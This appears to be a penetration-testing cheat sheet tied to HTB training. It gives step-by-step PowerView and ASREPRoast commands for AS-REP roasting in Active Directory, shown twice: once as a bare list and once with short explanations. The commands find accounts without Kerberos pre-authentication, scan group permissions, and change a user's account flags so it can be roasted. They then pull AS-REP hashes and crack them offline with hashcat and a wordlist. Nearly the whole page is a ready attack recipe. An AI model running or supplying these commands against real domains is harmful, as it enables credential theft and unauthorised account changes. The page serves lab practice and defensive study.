AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA

šŸŸ¢AS-REPS Roasting

. .\Powerview_dev.ps1

Enumerating accounts with Kerberos pre-auth disabled

Get-DomainUser -PreauthNotRequired -Verbose
Get-DomainUser -PreauthNotRequired -verbose | select samaccountname

Enumerate permissions for group

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match ā€œ<groupname>ā€}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match ā€œ<groupname>ā€} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Set pre-auth not required

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Request encrypted AS-REP

. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose

Enumerate all users with Kerberos pre-auth disabled and request a hash

Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl

Crack the hash with hashcat

Hashcat -a 0 -m 18200 hash.txt rockyou.txt

Active Directory Kerberos Enumeration and Modification

Enumerating Accounts with Disabled Kerberos Pre-Authentication

First, load the PowerView PowerShell module:

. .\Powerview_dev.ps1

Then, retrieve all users with pre-authentication not required, using:

Get-DomainUser -PreauthNotRequired -Verbose

Or, list only their usernames:

Get-DomainUser -PreauthNotRequired -verbose | select samaccountname

Enumerating Permissions for a Group

To find permissions for a specific group:

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"}

For a detailed list:

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Disabling Kerberos Pre-Authentication for a User

Load the PowerView script and run:

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Requesting Encrypted AS-REP for a User

After loading the ASREPRoast script:

. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose

Roasting Users with Pre-Auth Disabled

To enumerate and roast all users:

Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl

Cracking the Hash

Finally, crack the retrieved hash using hashcat:

Hashcat -a 0 -m 18200 hash.txt rockyou.txt
PreviousKerberoastNextSet SPN

Last updated